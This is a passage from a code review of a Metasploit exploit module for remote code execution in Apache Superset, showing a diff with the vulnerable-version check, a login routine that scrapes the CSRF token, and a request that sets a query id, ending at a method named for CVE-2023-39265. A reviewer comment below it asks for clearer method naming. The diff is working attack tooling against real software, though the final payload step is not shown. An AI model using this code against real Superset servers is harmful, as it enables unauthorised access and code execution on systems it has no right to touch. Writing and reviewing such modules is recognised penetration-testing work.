modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb

```diff
@@ -0,0 +1,448 @@
+    unless res.body =~ /&#34;version_string&#34;: &#34;([\d.]+)&#34;/
+      return CheckCode::Safe("#{peer} - Unexpected response, unable to determine version_string")
+    end
+
+    version = Rex::Version.new(Regexp.last_match(1))
+    if version < Rex::Version.new('2.0.1') && version >= Rex::Version.new('1.4.1')
+      Exploit::CheckCode::Appears("Apache Supset #{version} is vulnerable")
+    else
+      CheckCode::Safe("Apache Supset #{version} is NOT vulnerable")
+    end
+  end
+
+  def hexlify(data)
+    # https://github.com/camertron/binascii/blob/v1.0.1/lib/binascii/hex.rb#L13-L23
+    b2a_table = (0...256).each_with_object({}) do |b, ret|
+      ret[b] = b.to_s(16).rjust(2, '0')
+    end
+
+    String.new('', encoding: 'ASCII-8BIT').tap do |result|
+      data.each_byte do |byte|
+        result << b2a_table[byte]
+      end
+    end
+  end
+
+  def login
+    res = send_request_cgi!({
+      'uri' => normalize_uri(target_uri.path, 'login'),
+      'keep_cookies' => true
+    })
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200
+
+    fail_with(Failure::NotFound, 'Unable to determine csrf token') unless res.body =~ /name="csrf_token" type="hidden" value="([\w.-]+)">/
+
+    @csrf_token = Regexp.last_match(1)
+    vprint_status("#{peer} - CSRF Token: #{@csrf_token}")
+    print_status("#{peer} - Attempting login")
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'login', '/'),
+      'keep_cookies' => true,
+      'method' => 'POST',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'csrf_token' => @csrf_token
+      }
+    })
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::NoAccess, "#{peer} - Failed login") if res.body.include? 'Sign In'
+  end
+
+  def set_query_latest_query_id
+    vprint_status('Setting latest query id')
+    client_id = Rex::Text.rand_text_alphanumeric(8, 12)
+    data = Rex::MIME::Message.new
+    data.add_part('"' + client_id + '"', nil, nil, 'form-data; name="latest_query_id"')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'tabstateview', @tab_id),
+      'keep_cookies' => true,
+      'method' => 'PUT',
+      'data' => data.to_s,
+      'headers' => {
+        'Accept' => 'application/json',
+        'X-CSRFToken' => @csrf_token
+      }
+    )
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200
+
+    client_id
+  end
+
+  def cve_2023_39265
```

Comment:
I like the explicitness of the CVE reference being in the method name - but it's a bit hard to grok if you're not super familiar with the CVEs if you're just viewing the exploit code. It'd be great to rename the method to be a bit more descriptive for the average reader 😄